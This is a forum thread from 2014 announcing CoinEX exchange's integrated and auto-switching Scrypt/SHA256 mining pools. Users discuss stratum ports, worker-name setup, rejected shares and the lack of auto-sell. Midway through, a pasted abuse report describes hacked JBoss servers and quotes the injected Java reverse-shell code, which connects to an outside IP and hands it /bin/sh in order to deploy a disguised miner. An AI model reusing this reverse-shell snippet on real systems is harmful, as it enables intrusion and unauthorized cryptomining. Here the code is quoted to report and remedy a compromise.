Title: [ANN] CoinEX profit Switchpools Scrypt/SHA
Post by: captainfuture on January 11, 2014, 10:53:38 AM
I noticed many people didnt know it and therefore i decided to announce it.

CoinEX is not only an exchange, we have integrated pools at https://coinex.pw/mining/pools
You can mine at CoinEX and get your coins automatically to your exchange balance. no need to set an autopayout address.
To send your coins out from CoinEX to Wallets etc.. we have address books where you can save your several Coin address. Very comfortable to use.

https://dl.dropboxusercontent.com/u/25005920/coinex/Bildschirmfoto%202014-01-11%20um%2011.46.15.png

As soon your rewards are added to your balance you will get a notification about it

https://dl.dropboxusercontent.com/u/25005920/coinex/Bildschirmfoto%202014-01-11%20um%2011.53.43.png

and you can see at your balance details page every change of your balance (rewards, deposit, withdrawal, buy and sell)

Our SHA pools:

Our Scrypt pools:

https://dl.dropboxusercontent.com/u/25005920/coinex/Bildschirmfoto%202014-01-11%20um%2011.45.39.png

Creating an account is free, mining fee 2% and trading fee 0,2%
Our pools have VARDIFF and are DDOS protected with a 10 min PPLNS window.

You could add WUBS to your pool and exchange!!

Thanks CaptainFuture.

Does that mean it's a good time to ask again if we could get a StableCoin pool on there along with an SBC/BTC trading pair?  It's currently at v1.5 on the block chain and the previous difficulty issue has been resolved so it's good to go!

Go on, you know you want to.  ;)

We added a profit score column based on our buy orders:

We need some hashrate to test out our auto-switching pools. Connecting URLs:
Scrypt: stratum+tcp://stratum.coinex.pw:9933
SHA256: stratum+tcp://stratum.coinex.pw:9944

Please be sure to have failover pools set up.

Switchpool has prop payout. so the shares are counted till bock is found.

How does this auto switching pool works.
Can you explain profit score

the profitscore shows the profit related to BTC or LTC.
it is based on our buy orders with market depth 0.2 BTC and coindiff and rewards.
And it shows the market where you get this profit when you sell it.

first we need it all running fine with the switchpool.
then we think about other things.

Nice, already the top priority pool (Sha). When is gonna launch? for now it stays in my first failover pool

we are working on it. the more tester we have the better it gets...

Well its like a catch 22. If you have auto sell I might point my rig at this as I dont want to come and sell bunch of coins all the time. All other multipools have this feature. Anyways good luck.

if you join our SHA switchpool you have the chance to get the 0.5 BTC blockfinderbonus for a BTC block!!

SHA pool gets bonus for block. Scrypt looses hours of hashing power due to repeated TAG/FST orphans.

Also advertises: "And we've got ZERO FEES for trading while we're in beta! Drop in early"

Still in beta and getting charge fees for trading.

I noticed lots of gaps in mining time and lots of rejects while mining EAC. Also, I would like to be able to see the minimum amount for "autopayouts" for each coin, possibly even alter this myself?

scrypt works fine

Are the autoswitching pools down at the moment? I seem to be able to connect to the individual coin pools but the autoswitch seems to hang initially and then tell me there isnt anything found at the destination.

(I confirmed username/password was correct by connecting to the ANC pool)

Could someone please let me know what port numbers are being used for the autoswitching pool please, it seems 9933/9944 dont work for me >.<

one was left for 4 minutes whilst i wondered over to the coffee machine (trying to connect to the scrypt pool 9933) when i came back it just had the repeated message about nothing found on the URL maybe details are wrong etc etc

my other miner just goes black and doesnt say anything at all >.<  kind of annoying lol but its beta so should expect teething problems ^.^

it would be great if someone else could try connecting, IM currently on Windows 7 64 bit on both miners

try to connect to 9933 and set a failover pool to a normal coinex pool.
it should switch to the switchport as soon he recognizes as alive.

we will look into it why it needs some time to be seen as alive.

I switched from solo mining to help test,  Im a speculative miner at heart so prefer to mine coins before they are on exchanges (currently solo mining AOC coins with a ridiculously low difficulty its great at the moment :-)), so will head back over to that for an hour or two and then give it another try ^.^ Im sure it will run smooth sooner or later and if it provides a reasonable return I might leave the miners pointing at it long term (Its only 1.3MH so nothing major but every little helps i guess) :-) keep plugging away

Mining MOON right now.. to the MOON with MOON!

FYI for anyone who hasn't figured it out yet: To set username and password in your cgminer (or whatever) script, for this particular site, you don't user your site username, and you can't have a worker name that's like '1' or something. It seems you have to have a longer worker name and longer password than many pools. Then in your script just put your worker name for the site and the password as usual.

Please correct me if I'm misled here. I'm just going by the things I had to try to get my miner to start mining at coinex.

Thanks, captainfuture!

CaptainFuture,

I have a few questions to you.

1.
I can see that the scrypt switchpool is switching really frequently.
Is it really OK for the profitability? Is the pool powerful enough to find blocks between switches?

2.
If your switching algorithm is based on coinex.pw order book - shouldn't auto-sell be obligatory to make it really profitable?

3.
Are you planning to add user/worker statistics or any history to the user panel?

Sorry for asking multiple questions, but there is almost no information on coinex.pw website.

ad1) its proportional and right now we dont have a problem with that. DOGE and BTC are disabled right now, we still have too less hash for it.
ad2) yes
ad3) the pool will get more stats for sure

EAC is finally working and added to our rotation. LOT added too.

we ordered new servers and have to do an upgrade first.

we had lot of traffic today: our MOON/BTC volume is 1100 BTC the last 24 hours.
so to prevent lagging we cant add new features, coins and pools right now.

Dear Sirs,

I have to report to you that two of our JBoss servers were exploited today
using a Tomcat deployer hack. Specifically the following exploit
http://blog.rimuhosting.com/2011/03/17/jboss-exploits-running-python/

The following code was injected:
{
Socket socket = new Socket( "
50.57.145.165", 8081 );
Process process =
Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector(
process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector(
socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}

Note the IP address of the resulting deployment is a server in a network
address block delegated to Rackspace:

#
# The following results may also be obtained via:

Slicehost RSPC-654321664654 (NET-50-57-128-0-1) 50.57.128.0 - 50.57.159.255

Resulting in an unauthorized deployment as follows:

This is clearly a bitcoin mining application, crudely disguised.

The relevant log record from JBoss being:

I'm guessing the server at 50.57.145.165 has already been compromised in
some way, but I would only be guessing. I'd appreciate it if you guys would
take a look and notify whoever is running that machine that they'll need to
clean it up! We will patch our systems as well.

Thanks

Anyone having problem with switchpool SHA256?  I can't connect to it, and tries a few times at different part of the day/week.

I can connect to specific coin's pools, like OSC, but not the switchpool.

Ex, this works (OSC)
bfgminer -G -o stratum+tcp://stratum.coinex.pw:9025 -u <username.worker> -p <password>

But this doesn't (SwitchPool SHA256)
bfgminer -G -o stratum+tcp://stratum.coinex.pw:9944 -u <username.worker> -p <password>

By "doesn't work" i mean that there doesn't seem to be any connections.  I don't get work at all.

Regards,
Eric

Sorry, my bad...  Had to use for username just the worker name (and not username.workername).

Yeah I pointed that out on page 2. lol

It's completely different from every other pool I've mined in. lol

Hi,  Im on coinex mining scrypt at ~ 2Mh/s  using the switch pool at :9933

2 questions:

1) how do i enable auto sell?

2) I have 3 machines running cudaminer  and 1 machine running cgminer (with 2 GPUs),  im seeing alot of rejected shares on cgminer machine.   usually zero rejected shares on the cudaminer machines.  when i mine at other pools i get normal 0-0.5% rejected shares.

any ideas captainFuture?  the rejects are killing me on that cgminer machine at coinex bc that machine is my main, fastest rig.

thanks!

2 questions:

1) how do i enable auto sell?

2) I have 3 machines running cudaminer  and 1 machine running cgminer (with 2 GPUs),  im seeing alot of rejected shares on cgminer machine.   usually zero rejected shares on the cudaminer machines.  when i mine at other pools i get normal 0-0.5% rejected shares.

any ideas captainFuture?  the rejects are killing me on that cgminer machine at coinex bc that machine is my main, fastest rig.

thanks!

1) no autsell yet
2) not sure about that. i am mining on 9933 too and i have normal stats. when we are switching to faster coins the stales and rejects are higher but that is ok.

Currently I can see the following:

Quote
SwitchPool - SHA256    DEM    2.24 Gh/s    10.33 Th/s    568,584.34    less than a minute ago    1.00 | BTC

Why the SwitchPool is mining DEM not BTC when their profitability is equal?

Another question - is there any ETA for the auto-sell feature?
In my opinion it is not the most wanted thing regarding switchpool.

BTC is disabled from switchpool, cause we dont have the hash for the diff of this coin.
no ETA of auto-sell feature. What is in your opinion the most wanted thing regarding switchpool?

I can't connect to switchpool no matter if I try to put just worker name (and I've tried creating some unique workername name, then also tried username.workername as workername etc) or username.worker name as username. Anyone knows how to get this to work?

only use workername as username for miner.
set a failover pool and let it run. then your miner should see our pools alive after some time.

So does the site enforce uniqueness for the workername or the workername/password combination?

I'm mining on it just fine after I found the FAQ and got that info about using workername only, just wondered.

yes. your workername has to be unique, else you cant save it.
it doesnt make sense to use your nickname for mining, you can change your nickname as you want every minute, so that wouldnt make sense to use.

Enjoying this pool so far . . . but really needs Auto-sell.

For autosell, I'm using this: https://github.com/dtbartle/altcoin-autosell

I tweaked it a little, as per instructions I found (didn't save URL, sorry) to raise trade minimum in exchange_api.py (2 places in that file) so that it wouldn't try to sell balances under 1 of whatever coin. Reportedly works on Cryptsy too, but I don't need it there. Works great, I've never had an issue with it.

Any news regarding built-in auto-sell feature?
Without it, it really doesn't have much sense since choosing the currency to mine is based on current local order book.

Ty. I'm loving this switch pool.

A bit off topic but can we get our total Balances in BTC added by chance?

I've been mining on the SHA pool for a while, quite impressed with CoinEx so far and like that new coins are added often.

If I had but one complaint, is that trading is a bit cumbersome with the current interface with so many coins, and the balance column at the very bottom. Having the trading windows accessible from the balance column would be helpful, or another trade view that lets you see the just coins you currently have without the others.

we have a new gui on our todo-list with some changes....
first we have to fix some technical issues, thats more important right now.

- If you're going to set minimum withdraw amounts, can you please list them on the site?
- As mentioned before, auto-sell would be awesome.
- Any way of adding a piece to the gui that displays your current "unconfirmed" balances, and the status of their maturity?

Great pool though, loving it so far!

hi

I am using coinex for 2 months and i have no problem with single coin mining.

I am using guiminer; But whenever i change to autoswitching pools. Lots of problem occurs.

1. I have one rig with 2 r290s; when i connect with one 290 the other one always says connection problems for diffrent workers.

2. My hash rate seems really low on web site. normally i got lie 2Mh/s with autoswitching pools i have llike 300 Kh/s on guiminer values looks fine.

I made same account for two gpus at one rig. Seems to be working but really really low hashrate; please help
